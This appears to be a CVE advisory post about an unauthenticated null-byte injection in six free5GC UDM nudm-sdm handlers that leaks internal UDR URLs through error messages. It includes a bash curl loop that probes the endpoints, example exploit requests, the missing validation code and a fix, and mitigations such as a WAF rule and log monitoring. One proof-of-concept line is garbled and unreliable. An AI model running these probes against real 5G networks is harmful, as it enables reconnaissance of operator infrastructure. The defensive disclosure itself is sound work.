Listen to this Post
How the mentioned CVE works (20 lines):
The free5GC UDM’s `nudm-sdm` service fails to validate the `supi` path parameter in six GET handlers: HandleGetSmfSelectData, HandleGetSupi, HandleGetTraceData, HandleGetUeContextInSmfData, HandleGetNssai, and HandleGetSmData. Unlike `HandleGetAmData` which calls validator.IsValidSupi(), these handlers pass an attacker-controlled `supi` directly to the processor. The processor constructs a URL to forward the request to UDR (e.g., http://udr.internal:80/nudr-dr/v2/subscription-data/{supi}/...`). By injecting control characters like null byte (%00), an unauthenticated attacker breaks Go’s `net/url` parser. The parser rejects the URL containing an invalid control character, causing UDM to return a `500 Internal Server Error` with a `detail` field that leaks the full internal UDR URL (host, port, API version, path structure). This is a missed fix from CVE-2026-27642, which originally patched only the authentication handlers (HandleConfirmAuthandHandleGenerateAuthData). Affected endpoints:GET /{supi}/smf-select-data,GET /{supi},GET /{supi}/trace-data,GET /{supi}/ue-context-in-smf-data,GET /{supi}/nssai,GET /{supi}/sm-data. Proof-of-concept: `curl "http://http://udr.internal:80/nudr-dr/v2/subscription-data/imsi-22277\x00INJECTED//provisioned-data/…`. Protected endpoint returns 400. No patch available as of v1.4.2.
dailycve form:
Platform: free5GC UDM
Version: <= v1.4.2
Vulnerability: Input validation bypass
Severity: Medium
date: 2026-05-07
Prediction: 30 days post-disclosure
Analytics under What Undercode Say:
Test all six vulnerable endpoints
for endpoint in "smf-select-data" "trace-data" "ue-context-in-smf-data" "nssai" "sm-data" ""; do
if [ -z "$endpoint" ]; then
curl -s "http://target/nudm-sdm/v2/imsi-22277%00INJECTED"
else
curl -s "http://target/nudm-sdm/v2/imsi-22277%00INJECTED/$endpoint"
fi
done | grep -o 'http://[^"]'
Code snippet of missing validation (internal/sbi/api_subscriberdatamanagement.go)
Vulnerable handler:
supi := c.Params.ByName("supi")
s.Processor().GetSmfSelectDataProcedure(c, supi, plmnID, supportedFeatures)
Fixed version (add validator):
if !validator.IsValidSupi(supi) {
c.JSON(http.StatusBadRequest, problemDetail)
return
}
Exploit:
Unauthenticated attacker sends GET request to any vulnerable endpoint with `supi` containing a control character (e.g., null byte %00, carriage return %0d). Example: curl "http://192.168.1.100/nudm-sdm/v2/imsi-12345%00exploit/smf-select-data". The server responds with HTTP 500 and JSON `detail` field leaking internal UDR URL like "parse \"http://udr.internal:8080/nudr-dr/v2/subscription-data/imsi-12345\x00exploit//...\": invalid control character". No authentication required.
Protection from this CVE:
- Apply missing `validator.IsValidSupi()` to all six handlers following `HandleGetAmData` pattern.
- Deploy WAF rule to reject `supi` parameters containing control characters (
\x00-\x1f). - Disable detailed error messages in production (set
debug=false). - Until patch, manually patch source or use reverse proxy to validate `supi` against regex
^imsi-[0-9]{15}$. - Monitor logs for 500 errors with `parse` or `control character` keywords.
Impact:
Information disclosure of internal infrastructure: UDR hostname/port, full API path (/nudr-dr/v2/subscription-data/...), UDR API version, and internal service naming conventions. This intelligence enables further attacks against UDR (e.g., CVE-2026-27642 variants, privilege escalation, data exfiltration) and other 5G core components. No authentication required, remote exploitation over network.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
